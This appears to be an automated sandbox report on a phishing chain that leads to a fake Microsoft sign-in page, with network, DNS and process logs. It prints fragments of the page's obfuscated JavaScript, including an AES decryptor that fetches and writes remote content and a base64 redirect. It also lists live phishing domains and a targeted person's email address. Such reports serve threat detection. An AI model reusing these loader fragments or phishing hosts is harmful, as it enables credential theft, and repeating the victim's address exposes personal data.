Click to jump to signature section
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | LLM: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The URL 'oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com' does not match the legitimate domain 'microsoft.com'., The URL contains multiple hyphens and unusual subdomains, which are common indicators of phishing., The domain 'linodeobjects.com' is associated with Linode, a cloud hosting provider, which could be used by anyone to host content, including potentially malicious actors., The presence of a password input field increases the risk, as phishing sites often attempt to capture sensitive information. DOM: 0.4.pages.csv |
Source: Yara match | File source: 0.1.pages.csv, type: HTML |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: https://quantumazurao.com.de///4631.php |
Source: https://risaleinurtz.com/wp-includes/tracking/#geris.perez@goaa.org | HTTP Parser: var domainMatching = 'google'; var redirectUrl = 'https://oracle-edw-optim-analytic |
Source: https://risaleinurtz.com/wp-includes/tracking/#geris.perez@goaa.org | HTTP Parser: var domainMatching = 'google'; var redirectUrl = 'https://oracle-edw-optim-analytic |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: window.location.href = atob( |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: Number of links: 1 |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: <input type="password" .../> found but no <form action="... |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: Total embedded image size: 45687 |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: Base64 decoded: {"a":"7N++aAXixO4+iI7U2ywn3jmQwJpaoDUr4s8rVnAefgs=","c":"54e7ae4f0ee8ab46f4e6802fdd541a3b","b":"7c9298b2a1098640439f8b29a666170a71eae05cd58ab13c44350fe5388d57aa6ec401f40d84e84ee46807fda778598fe77a83b740701d9f40ee131931f324a9de9774bd2abf57f5fa5a9efefd21fb7... |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: Title: Continue to your sign-in does not match URL |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: async function sacrum(vacantly){var{a,b,c,d}=json.parse(vacantly); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}),{iv:cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function rabbet() { yellowish.hidden= 0; kale.hidden = 1; document.write(await sacrum(await (await fetch(await sacrum(atob(`eyjhijoin04rk2fbwgl4tzqrauk3vtj5d24zam1rd0pwyw9evxi0czhyvm5bzwzncz0ilcjjijointrln2flngywzwu4ywi0nmy0zty4mdjmzgq1ndfhm2iilcjiijoin2m5mjk4yjjhmta5ody0mdqzowy4yji5yty2nje3mge3mwvhzta1y2q1ogfimtnjndqzntbmztuzodhkntdhytzlyzqwmwy0mgq4ngu4ngvlndy4mddmzge3nzg1othmztc3ytgzyjc0mdcwmwq5zjqwzwuxmze5mzfmmzi0ytlkztk3nzrizdjhymy1n2y1zme1ytllzmvmzdixzmi3mzywnmq4yzexyzfjmjeyngm2mzk2ywu1owvhmze4nge2mji2zjg2nge0mgyynwezmmu1owvmmtnkzjjizjg1yzmxyji5mjk0nzu4nzdmnjhkzdq4yzq5yzq5m2uwmdywmjdhmzk5mmm1zdy1mgjlmgnmowe3odrim2i3yziwmjm4zta4mddlyjawytayotg1zgrim... |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: <input type="password" .../> found |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: No favicon |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: No favicon |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: No favicon |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: No <meta name="author".. found |
Source: https://oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com/index.html#6geris.perez@goaa.org | HTTP Parser: No <meta name="copyright".. found |
Source: unknown | HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49729 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49755 version: TLS 1.2 |
Source: chrome.exe | Memory has grown: Private usage: 21MB later: 28MB |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 52.149.20.212 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic | HTTP traffic detected: GET /c/eJx0yjFyhSAQANDTQBeHXVaFgiKN90B29ZMQdRCSGU-fyQFSv8dhHdmSlgAzOjIEnvQrgLeSVgTrMPlRmBmtoMA2-W1NE-gc0CCBMQ4mmCwNntfkeJxnEYpuc4rMx9mk9NKHdH7pEl6tXbey7woXhUvNdyySj17b8xcULj_XWz5S6Sy3wqXVmD7zsSu0u9R8D5dUeRSZ_YxxOOuua_gHvgP-BgAA__-1WEOb HTTP/1.1Host: email-tracking.jotelulu.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9 |
Source: global traffic | DNS traffic detected: DNS query: email-tracking.jotelulu.com |
Source: global traffic | DNS traffic detected: DNS query: risaleinurtz.com |
Source: global traffic | DNS traffic detected: DNS query: www.google.com |
Source: global traffic | DNS traffic detected: DNS query: goaa.org |
Source: global traffic | DNS traffic detected: DNS query: oracle-edw-optim-analytics-platform.se-sto-1.linodeobjects.com |
Source: global traffic | DNS traffic detected: DNS query: cdnjs.cloudflare.com |
Source: global traffic | DNS traffic detected: DNS query: challenges.cloudflare.com |
Source: global traffic | DNS traffic detected: DNS query: quantumazurao.com.de |
Source: global traffic | DNS traffic detected: DNS query: code.jquery.com |
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740 |
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738 |
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736 |
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735 |
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729 |
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728 |
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726 |
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725 |
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723 |
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49678 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757 |
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755 |
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753 |
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752 |
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750 |
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748 |
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: unknown | HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49729 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49755 version: TLS 1.2 |
Source: classification engine | Classification label: mal68.phis.win@22/9@33/215 |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps |
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1900,i,10416444873644335712,12567406530727459452,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://email-tracking.jotelulu.com/c/eJx0yjFyhSAQANDTQBeHXVaFgiKN90B29ZMQdRCSGU-fyQFSv8dhHdmSlgAzOjIEnvQrgLeSVgTrMPlRmBmtoMA2-W1NE-gc0CCBMQ4mmCwNntfkeJxnEYpuc4rMx9mk9NKHdH7pEl6tXbey7woXhUvNdyySj17b8xcULj_XWz5S6Sy3wqXVmD7zsSu0u9R8D5dUeRSZ_YxxOOuua_gHvgP-BgAA__-1WEOb" |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1900,i,10416444873644335712,12567406530727459452,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk |